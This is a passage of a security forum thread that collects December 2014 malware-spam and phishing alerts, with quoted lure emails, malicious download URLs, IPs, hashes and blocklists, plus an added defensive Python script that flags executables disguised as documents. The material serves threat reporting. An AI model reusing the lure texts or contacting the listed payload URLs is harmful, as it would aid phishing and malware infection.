... criminals responsible for this phishing attack can use the stolen login details to hijack the victims' GoDaddy account. Once they have gained access to the account, the criminals can take control of the victim's website and email addresses and use them to perpetrate spam, scam, and malware attacks. Always login to your online accounts by entering the web address into your browser's address bar rather than by clicking-a-link in an email."

:fear: :mad:

AplusWebMaster
2014-12-16, 17:09
FYI...

Fake 'eFax Drive' SPAM - malicious ZIP
- http://blog.mxlab.eu/2014/12/16/url-in-fake-email-from-efax-drive-youve-received-a-new-fax-leads-to-malicious-zip-archive/
Dec 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “You’ve received a new fax”. This email is sent from the -spoofed- address and has the following body:
New fax at SCAN9106970 from EPSON by https ://******* .com
Scan date: Tue, 16 Dec 2014 13:17:59 +0000
Number of pages: 2
Resolution: 400×400 DPI
You can secure download your fax message at:
hxxp: //nm2b .org/bhnjhkkgvq/ufqielyyva.html
(eFax Drive is a file hosting service operated by J2, Inc.)

The downloaded file document7241_pdf.zip contains the 33 kB large file document7241_pdf.scr. The trojan is known as Packed.Win32.Katusha.1!O or Malware.QVM20.Gen. At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d8b1d64ae49b437df163061af11c8f0f0e5dad338c37cfedd4e6f30e37f6499c/analysis/

nm2b .org: 173.254.28.126: https://www.virustotal.com/en/ip-address/173.254.28.126/information/
___

Fake 'Bank account frozen' SPAM - doc malware
- http://myonlinesecurity.co.uk/bank-account-frozen-notice-note-attention-fake-word-doc-malware/
16 Dec 2014 - "'Bank account frozen notice, note, attention. Attention #CITI-44175PI-77527' with a cab attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
Notification Number: 8489465
Mandate Number: 6782144
Date: December 16, 2014. 01:13pm
In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file “CITI-44175PI-77527.cab” for details.
Yours truly,
Kathy Schuler ...

16 December 2014: CITI-44175PI-77527.cab : Extracts to: CITI-44175PI-77527.scr
Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper word.doc file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0699621c07f92b81d0b7eef250ae15830c10034b8f1b04a07e0fb43cbcfea54/analysis/1418745402/
___

Wells Fargo Secure Message Spam
http://threattrack.tumblr.com/post/105365947973/wells-fargo-secure-meessage-spam
Dec 16, 2014 - "Subjects Seen:
You have a new Secure Message
Typical e-mail details:
You have received a secure message
Read your secure message by download document-75039.pdf. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting:
nexpider .com/sawdnilhvi/ckyilmmoca.html

Malicious URLs:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious File Name and MD5:
document82714.scr (98FE8CAD93B6FCDE63421676534BCC57)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8dec4c587c25e211bdabdb5bb92d35e4/tumblr_inline_ngostrpvc41r6pupn.png

Tagged: Upatre, Wells Fargo
___

Trawling for Phish
- https://blog.malwarebytes.org/online-security/2014/12/trawling-for-phish/
Dec 16, 2014 - "... avoid on your travels, whether you’re sent a link to them directly or see the URLs linked in an email. First up, a page located at:
secure-dropboxfile (dot)hotvideostube(dot)net/secure-files-dropbox/document/
It claims to offer a shared Dropbox document in return for entering your email credentials. It follows the well-worn pattern of offering multiple login options for different types of email account, including Gmail, AOL, Windows Live, Yahoo and “other”:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn1.jpg
The website itself has a poor reputation on Web of Trust, has been listed as being compromised on defacement archives and was also hosting a banking phish not so long ago. Should visitors attempt to login, it sends them to a shared Google Document (no Dropbox files on offer here) which is actually a “public prayer request” spreadsheet belonging to a Church:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn3.jpg
The next page is Google Drive themed and located at:
yellowpagesexpress (dot)com/cgi-bin/Secure Management/index(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn2.jpg
As before, it asks the visitor to login with the widest possible range of common email accounts available, before sending those who enter their details to an entirely unrelated Saatchi Art investment webpage. Readers should always be cautious around pages claiming to offer up files in return for email logins – it’s one of the most common tactics for harvesting password credentials."

:fear: :mad:
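The posts above keep returning to two tricks: an executable (.exe/.scr) whose name ends in "_pdf" or "_jpeg" plus padding, which Windows shows without its real extension behind a document icon, and URSNIF's habit of turning a .PDF into a PE file of the same name. The following triage routine, written here as an added example (not code from any of the quoted blogs), flags both patterns; every sample file name and header byte string in it is constructed for illustration, and `classify_name`, `classify_content` and `triage` are names chosen for this example.

```python
"""Mail-gateway / drive-scan triage for spoofed-icon attachments and
PE files masquerading as documents. Example code written for this thread;
all sample names and byte strings below are constructed."""
import re
from typing import List, Optional

# Extensions Windows runs directly. A mail attachment carrying one of these
# while dressed up as a document is the "spoofed icon" pattern in the posts.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
# Document / image types the lures imitate (PDF, JPG, Word, Excel).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png"}

MZ = b"MZ"           # DOS/PE header: what every Windows executable starts with
PDF_MAGIC = b"%PDF"  # what a genuine PDF starts with


def classify_name(filename: str) -> Optional[str]:
    """Name-only check (what a gateway sees before opening the archive).
    Returns a reason if the name is suspicious, else None."""
    name = filename.strip().lower()
    m = re.match(r"^(.*)\.([a-z0-9]{1,5})$", name)  # real extension is the LAST one
    if not m:
        return None
    stem, ext = m.group(1), m.group(2)
    if ext not in EXECUTABLE_EXTS:
        return None
    # Tokenise the stem; "document7241_pdf" or "... NO. 1_jpeg.........." yields
    # a document extension as a token, i.e. a fake extension placed where the
    # user will read it while the real one is hidden by Explorer's default.
    tokens = re.split(r"[^a-z0-9]+", stem)
    lure = next((t for t in tokens if t in DOCUMENT_EXTS), None)
    if lure:
        return f"executable .{ext} posing as .{lure}"
    # Runs of dots or spaces used to push the real extension out of view.
    if re.search(r"(\.\s*){3,}|\s{3,}", stem):
        return f"executable .{ext} with padding in name"
    return f"executable .{ext} attachment"


def classify_content(filename: str, head: bytes) -> Optional[str]:
    """Header check for files already on disk (e.g. a removable drive after
    an URSNIF infection): does the declared type agree with the bytes?"""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if head.startswith(MZ) and ext in DOCUMENT_EXTS:
        return f"PE executable (MZ header) carrying .{ext} name"
    if ext == "pdf" and not head.startswith(PDF_MAGIC):
        return "pdf without %PDF header"
    return None


def triage(filename: str, head: bytes = b"") -> List[str]:
    """Combine both checks; an empty list means no name/header finding.
    A clean result is not a clean file: macro-bearing .doc/.xls lures in
    these posts pass both checks and need content inspection instead."""
    return [r for r in (classify_name(filename), classify_content(filename, head)) if r]


# Constructed samples mirroring the attachment names quoted in the thread.
SAMPLES = [
    ("Check_Copy_Void.scr", b"MZ\x90\x00"),
    ("Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe", b"MZ\x90\x00"),
    ("document7241_pdf.scr", b"MZ\x90\x00"),
    ("CITI-44175PI-77527.scr", b"MZ\x90\x00"),
    ("Quarterly_Report.pdf", b"MZ\x90\x00"),    # URSNIF-style PE with a .pdf name
    ("Quarterly_Report.pdf", b"%PDF-1.5\n"),    # genuine PDF
    ("35056_49_2014.doc", b"\xd0\xcf\x11\xe0"),  # OLE2 Word doc: macro check needed
]

if __name__ == "__main__":
    for name, head in SAMPLES:
        findings = triage(name, head)
        print(f"{name!r:60} -> {findings or 'no name/header finding'}")
```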

AplusWebMaster
2014-12-17, 14:31
FYI...

Fake 'PL REMITTANCE' malware SPAM
- http://blog.dynamoo.com/2014/12/pl-remittance-details-ref844127rh.html
17 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Briana
Date: 17 December 2014 at 08:42
Subject: PL REMITTANCE DETAILS ref844127RH
The attached remittance details the payment of £664.89 made on 16-DEC-2014 by BACSE.
This email was generated using PL Payment Remittance of Integra Finance System.
Can you please check that your supplier details are correct, if any changes are required please email back to this email address quoting your remittance reference.

The reference in the subject and the name of the Excel attachment differ from email to email, but are always consistent in the same message. There are two poorly detected malicious Excel files that I have seen [1] [2] containing two slightly different macros, which then reach out to the following download locations:
http ://23.226.229.112:8080/stat/lldv.php
http ://38.96.175.139:8080/stat/lldv.php
The file from these locations is downloaded as test.exe and is then saved to %TEMP%\VMHKWKMKEUQ.exe. This has a VirusTotal detection rate of 1/55*. The ThreatTrack report shows it POSTing to the following IP:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP has been used in several recent attacks and I strongly recommend blocking it. The Malwr report also shows it dropping a malicious DLL identified as Dridex. The ThreatExpert report gives some different IPs being contacted:
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer, Germany)
The Ukrainian IP is definitely malicious, but if you wanted to establish maximum protection then I would recommend the following blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
23.226.229.112
38.96.175.139 "
1] https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418810946/

2] https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418810941/

* https://www.virustotal.com/en/file/a1699fdddc2ffcfdc55b71861b7851719cb277a655053403b1a6fec0c895a264/analysis/1418810686/

> http://blog.mxlab.eu/2014/12/17/new-fake-email-pl-remittance-details-ref1790232eg-with-malcious-xls-in-the-wild/
Dec 17, 2014
Screenshot of the XLS: http://img.blog.mxlab.eu/2014/20141205_remittance_01.gif
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/

> http://myonlinesecurity.co.uk/integra-finance-system-pl-remittance-details-ref6029413oh-excel-xls-malware/
17 Dec 2014
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418816542/

> https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418817871/
___

Fake 'Blocked ACH Transfer' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/12/blocked-ach-transfer-spam-has-malicious.html
17 DEC 2014 - "Another spam run pushing a malicious Word attachment..
Date: 17 December 2014 at 07:27
Subject: Blocked ACH Transfer
The ACH transaction (ID: 618003565), recently sent from your online banking account, was rejected by the Electronic Payments Association.
Canceled transaction
ACH file Case ID 623742
Total Amount 2644.93 USD
Sender e-mail info@mobilegazette.com
Reason for rejection See attached word file
Please see the document provided below to have more details about this issue...
Screenshot: https://2.bp.blogspot.com/-HHVnC18smUE/VJGXBjF2VVI/AAAAAAAAF-o/yzQZ2etQFYk/s1600/ach.png

Attached is a file ACH transaction 3360.doc which isn't actually a Word 97-2003 document at all, but a malicious Word 2007 document that would normally have a .DOCX extension (which is basically a ZIP file). The current VirusTotal detection rate of this is just 1/55*. Inside this is a malicious macro... which downloads a file from:
http ://www.lynxtech .com.hk/images/tn.exe
This has a VirusTotal detection rate of just 1/54**. The Malwr report shows it POSTing to 5.187.1.78 (Fornex Hosting, Germany) and also a query to 209.208.62.36 (Atlantic.net, US). Presumably this then drops additional components onto the infected system, although I do not know what they are.
Recommended blocklist:
5.187.1.78
209.208.62.36 "
* https://www.virustotal.com/en/file/61b8edb31972b04fd2652278cca4431f498ed7930833848233da057ebf842660/analysis/1418826644/

** https://www.virustotal.com/en/file/1269bc3080617da54bdf74b04073c273109545643159883147f141742eb9fc75/analysis/1418826840/
___

Exploit Kits in 2014
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-new-in-exploit-kits-in-2014/
Dec 17, 2014 - "... Exploits targeting Internet Explorer, Silverlight, and Adobe Flash vulnerabilities were frequently used by exploit kits in the past year. The four vulnerabilities below were some of the most frequently targeted by exploit kits:
CVE-2013-0074 (Silverlight)
CVE-2014-0515 (Adobe Flash)
CVE-2014-0569 (Adobe Flash)
CVE-2014-2551 (Internet Explorer)
The most notable change in this list is the relative absence of Java vulnerabilities. Exploit kits have been removing Java because of the increasing use of click-to-play for Java applets, rendering Java a far less attractive target for exploits. The table below shows which exploits are in use by exploit kits:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
Plugin Detection: Almost all exploit kits run some sort of software that detect the browser platform a would-be victim is running in order to determine which exploit to send to the user.
The code necessary to do this varies from one exploit kit to another, and is actually fairly complex due to the number of permutations of browsers and plugins that are possible.
Two exploit kits – Nuclear and FlashPack – use a legitimate JavaScript library, PluginDetect. This minimizes the work the creators of the exploit kit need to do, as well as providing a complete set of features. However, this also means that this library has known characteristics: this makes it more visible to security vendors looking for sites used by exploit kits. By contrast, most exploit kits write their own library to perform this task. This makes detection harder, but it also reduces the capabilities of the libraries. Many of these libraries, for example, will only function under Internet Explorer. The Magnitude exploit kit uses a third method – server-side code – too. The following table summarizes which libraries are used.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/exploit-kit-detect-b.png
Antivirus Detection: A new feature that has been added to exploit kits is the ability to detect installed security software. If certain specific security products are installed, the exploit kit will stop itself from running. Both antivirus products and virtual machine software can be targeted in this manner. This behavior is possible due to a vulnerability in Internet Explorer (CVE-2013-7331). This vulnerability allows an attacker to check for the presence of files and folders on an affected system. It was first reported to Microsoft in February 2014, but was only patched in September of the same year as part of MS14-052. The following table summarizes the products that each exploit kit detects:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-software.png
Obfuscation Techniques: Exploit kits regularly use various techniques to obfuscate their activity, but some exploit kits have added new techniques. In both of these cases, the attackers are using legitimate tools to obfuscate their files. The Angler exploit kit now uses the Pack200 format to help avoid detection. Pack200 is a compact archive format that was developed by Sun (Java’s original developers) to compress .JAR files significantly. Tools to uncompress these files are provided as part of the Java development kit, but many security products don’t support these formats (so they are unable to scan the said malicious file)...
Summary: Exploit kit developers have not been idle in the year since the collapse of the Blackhole exploit kit. They have made various improvements that help improve the capabilities of these tools. The defenses against these tools on the part of users remain the same. We highly recommend that users implement all updates to their software as is practical, since many of the vulnerabilities targeted by attackers have long been fixed by software vendors."
___

Dyre Banking Trojan - Secureworks
- http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
Dec 17 2014

:mad: :fear::fear:

AplusWebMaster
2014-12-18, 14:57
FYI...

More than 100,000 'WordPress sites infected with Malware'
- https://www.sans.org/newsletters/newsbites/xvi/99#301
Dec 15, 2014 - "More than 100,000 websites running on WordPress content management system have been found to be infected with malware that attacks the devices of site visitors. Google has blacklisted more than 11,000 domains. Reports suggest that the attackers exploited a vulnerability in the Slider Revolution Premium plug-in*, which the company has known about since September 2014..."
> http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
Dec 15, 2014
(More links at the sans URL above.)

* http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Dec 14, 2014
___

Fake 'AquAid Card' SPAM – doc malware
- http://myonlinesecurity.co.uk/tracey-smith-aquaid-card-receipt-word-doc-malware/
18 Dec 2014 - "'AquAid Card Receipt' pretending to come from Tracey Smith <tracey.smith@aquaid.co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO -NOT- follow the advice they give to enable macros to see the content... The email looks like:
Hi
Please find attached receipt of payment made to us today
Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Card-Receipt-Aquaid-malicious-email.jpg

The macros in this malicious word doc try to connect to http ://sardiniarealestate .info/js/bin.exe ..which is saved as %TEMP%\YEWZMJFAHIB.exe – this has a marginally better detection rate of 3/53*. As we have seen in so many recent attacks like this one, there are 2 versions of the malware:
18 December 2014 : CAR014 151239.doc ( 124kb) | Current Virus total detections: 2/56**
CAR014 151239.doc (130 kb) | Current Virus total detections: 2/55***
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them..."
* https://www.virustotal.com/en/file/b73b4a11f725137a4e1aa19236a5b61671d0880edc8ba1c4d7dd22031e55a922/analysis/1418893740/

** https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418891360/

*** https://www.virustotal.com/en/file/048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827/analysis/1418891888/


> http://blog.dynamoo.com/2014/12/malware-spam-aquaidcouk-card-receipt.html
18 Dec 2014
- https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418893415/
... Recommended blocklist:
74.208.11.204
81.169.156.5 "
___

Fake 'Internet Fax' SPAM - trojan Upatre.FH
- http://blog.mxlab.eu/2014/12/18/email-internet-fax-job-contains-url-that-downloads-trojan-upatre-fh/
Dec 18, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”, the email is sent from the spoofed address “MyFax <no-replay@ my-fax.com>” and has the following body:
Fax image data
hxxp ://bursalianneler .com/documents/fax.html

The downloaded file fax8642174_pdf contains the 21 kB large file fax8642174_pdf.exe. The trojan is known as Upatre.FH. The trojan installs itself by creating the service ioiju.exe and makes sure that it boots when Windows starts, modifies several Windows registries... At the time of writing, 1 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/745a25bcff06daf957730207c8b34704288fc5232fac81a228a5f2b4f577f048/analysis/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.52.226: https://www.virustotal.com/en/ip-address/192.185.52.226/information/
78.46.73.197: https://www.virustotal.com/en/ip-address/78.46.73.197/information/
UDP communications
203.183.172.196: https://www.virustotal.com/en/ip-address/203.183.172.196/information/
203.183.172.212: https://www.virustotal.com/en/ip-address/203.183.172.212/information/
___

Fake 'JPMorgan Chase' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-received-new-secure-message-fake-pdf-malware/
17 Dec 2014 - "'JPMorgan Chase & Co You have received a new secure message' pretending to come from random names @jpmorgan .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Need Help?
Your personalized image for: <redacted>
This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE
Copyright 2013 JPMorgan Chase & Co. All rights reserved

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/You-have-received-a-new-secure-message.jpg

17 December 2014: message_zdm.zip: Extracts to: message_zdm.exe
Current Virus total detections: 11/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/25808f5afa8c93d477a954e4a0444b63fbaccac72a56dcd87d252df2606c0e19/analysis/1418844158/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
217.199.168.166: https://www.virustotal.com/en/ip-address/217.199.168.166/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.10.68.178: https://www.virustotal.com/en/ip-address/217.10.68.178/information/

- http://threattrack.tumblr.com/post/105464831328/jp-morgan-chase-secure-message-spam
Dec 18, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/af4b5b4c92d5319141774b223b9140b5/tumblr_inline_ngqwacJHwm1r6pupn.png
Tagged: JPMorgan, Upatre
___

ICANN e-mail accounts, zone database breached in spearphishing attack
Password data, other personal information of account holders exposed.
- http://arstechnica.com/security/2014/12/icann-e-mail-accounts-zone-database-breached-in-spearphishing-attack/
Dec 17 2014 - "Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet's address system, said in a release published Tuesday* that the breach also gave attackers administrative access to all files stored in its centralized zone data system**, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system. Domain registries use the database to help manage the current allocation of hundreds of new generic top level domains (gTLDs) currently underway. Attackers also gained unauthorized access to the content management systems of several ICANN blogs... As the group controlling the Internet's domain name system, ICANN is a prime target for all kinds of attacks from hackers eager to obtain data that can be used to breach other targets..."
* https://www.icann.org/news/announcement-2-2014-12-16-en

** https://czds.icann.org/en
___

Worm exploits nasty Shellshock bug to commandeer network storage systems
- http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
Dec 15 2014 - "Criminal hackers are actively exploiting the critical shellshock vulnerability* to install a self-replicating backdoor on a popular line of storage systems, researchers have warned. The malicious worm targets network-attached storage systems made by Taiwan-based QNAP, according to a blog post published Sunday** by the Sans Institute. The underlying shellshock attack code exploits a bug in GNU Bash that gives attackers the ability to run commands and code of their choice on vulnerable systems. QNAP engineers released an update in October that patches systems against the vulnerability, but the discovery of the worm in the wild suggests a statistically significant portion of users have yet to apply it. Infected systems are equipped with a secure shell (SSH) server and a new administrative user, giving the attackers a persistent backdoor to sneak back into the device at any time in the future..."
* http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

** https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

:fear::fear: :mad:

AplusWebMaster
2014-12-19, 13:52
FYI...

Fake 'BACS payment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/bacs-payment-ref9408yc-excel-xls-malware/
19 Dec 2014 - "'BACS payment Ref:9408YC' coming from random email addresses with a malicious Excel XLS attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see below our payment confirmation for funds into your account on Tuesday re invoice 9408YC
Accounts Assistant
Tel: 01874 430 632
Fax: 01874 254 622

19 December 2014: 9408YC.xls - Current Virus total detections: 0/53* 0/55** 0/53***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbdc93de4eded4d2df825a30f0e255136c3564738e3298f367a4557b5b360eba/analysis/1418987287/

** https://www.virustotal.com/en/file/2894ad6bef05b0bba2c6f56194f7402c5535b03c7bedda7df7065269cd52cb39/analysis/1418987903/

*** https://www.virustotal.com/en/file/f26d6bc06ae906df591432cc5a5038589358f1681a64c896c468a72beccb70c5/analysis/1418987497/

- http://blog.dynamoo.com/2014/12/malware-spam-bacs-payment-ref901109rw.html
19 Dec 2014
> https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
"... UPDATE: A further version of this is doing the rounds with an attachment which also has zero detections at VirusTotal*..."
* https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
___

Fake ACH SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-blocked-transaction-case.html
19 Dec 2014 - "This -fake- ACH spam leads to malware:
Date: 19 December 2014 at 16:06
Subject: Blocked Transaction. Case No 970332
The Automated Clearing House transaction (ID: 732021371), recently initiated from your online banking account, was rejected by the other financial institution.
Canceled ACH transaction
ACH file Case ID 083520
Transaction Amount 1458.42 USD
Sender e-mail info@victimdomain
Reason of Termination See attached statement
Please open the word file enclosed with this email to get more info about this issue.

In the sample I have seen, the attachment is ACH transfer 1336.doc which despite the name is actually a .DOCX file, which has a VirusTotal detection rate of 4/54*. Inside are a series of images detailing how to turn off macro security.. which is a very -bad- idea.
1] https://1.bp.blogspot.com/-zPH8zcx7OrY/VJR1Q7QBOEI/AAAAAAAAGAM/xX6zhss2M4Q/s1600/image3.png

2] https://2.bp.blogspot.com/-84ljBD1vRQg/VJR1Ru59Q2I/AAAAAAAAGAU/WcH0b9IEjII/s1600/image4.png

3] https://1.bp.blogspot.com/-vCCQWdg2iQ0/VJR1R9zpj1I/AAAAAAAAGAY/ASyT9ZXBVz8/s1600/image5.png

4] https://4.bp.blogspot.com/-cCjgc3glQpg/VJR1SDKNwjI/AAAAAAAAGAc/c_b1Rf1nawQ/s1600/image6.png

If you enable macros, then this macro... will run which will download a malicious binary from http ://nikolesy .com/tmp/ten.exe, this has a VirusTotal detection rate of 8/51** and is identified as the Dridex banking trojan."
* https://www.virustotal.com/en/file/332621eaa52f0289be55f01c6fa61dc93f541cfb52f718148958b72209e084ac/analysis/1419014981/

** https://www.virustotal.com/en/file/22015b1e727d0846fd051a1ee6bb8a243f2c8eb150d67bb8e0c82574eed694e4/analysis/1419015141/
___

Fake 'my-fax' SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-no-replaymy-faxcom.html
19 Dec 2014 - "This -fake- fax spam leads to malware:
From: Fax [no-replay@ my-fax .com]
Date: 19 December 2014 at 15:37
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: http ://crematori .org/myfax/company.html
Documents are encrypted in transit and store in a secure repository...

... Clicking the link downloads a file fax8127480_924_pdf.zip which in turn contains a malicious executable fax8127480_924.exe which has a VirusTotal detection rate of 3/55*. Most automated analysis tools are inconclusive... but the VT report shows network connections to the following locations:
http ://202.153.35.133:40542/1912uk22//0/51-SP3/0/
http ://202.153.35.133:40542/1912uk22//1/0/0/
http ://natural-anxiety-remedies .com/wp-includes/images/wlw/pack22.pne
Recommended blocklist:
202.153.35.133
natural-anxiety-remedies .com "
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/1419003908/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Fake 'Target Order Confirmation' - malware SPAM
- http://www.hoax-slayer.com/target-order-information-malware.shtml
Dec 19, 2014 - "Order confirmation email purporting to be from Target claims that the company's online store has an order addressed to you... The email is -not- from Target. The link in the message opens a compromised website that contains malware. The Target version is just one in a series of similar malware messages that have falsely claimed to be from well-known stores, including Walmart, Costco and Walgreens...
> http://www.hoax-slayer.com/images/target-order-information-malware-1.jpg
If you use a non-Windows operating system, you may see a message claiming that the download is not compatible with your computer. If you are using one of the targeted operating systems, the malicious file may start downloading automatically. Alternatively, a message on the website may instruct you to click a link to download the file. Typically, the download will be a .zip file that hides a .exe file inside. Opening the .exe file will install the malware. The malware payload used in these campaigns can vary. But, typically, the malware can steal personal information from your computer and relay it to online scammers. The malware in this version is designed to add your computer to the infamous Asprox Botnet... This email is just one in a continuing series of malware messages that claim to be from various high profile stores, including Costco, Walmart and Walgreens. Other versions list order or transaction details, but do not name any particular store. Again, links in the messages lead to malware websites. In some cases, the malware is contained in an attached file. If you receive one of these -bogus- emails, do -not- click any links or open any attachments..."
___

Walgreens Order Spam
- http://threattrack.tumblr.com/post/105606986528/walgreens-order-spam
Dec 19, 2014 - "Subjects Seen:
Order Status
Typical e-mail details:
E-shop Walgreens has received an order addressed to you which has to be confirmed by the recipient within 4 days. Upon confirmation you may pick it in any nearest store of Walgreens.
Detailed order information is provided here.
Walgreens

Malicious URLs:
rugby-game .com/search.php?w=ZT5EpruzameN92MeSlvI09DbnfrIhx1yqu3wrootEpM=
Malicious File Name and MD5:
Walgreens_OrderID-543759.exe (39CEBF3F19AF4C4F17CA5D8EFB940CB6)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/834af3262758a5dc4d3189db0af8a91d/tumblr_inline_ngu2ovU7f51r6pupn.png

Tagged: Walgreens, Kuluoz
___

Ars was briefly hacked yesterday; here’s what we know
If you have an account on Ars Technica, please change your password today..
- http://arstechnica.com/staff/2014/12/ars-was-briefly-hacked-yesterday-heres-what-we-know/
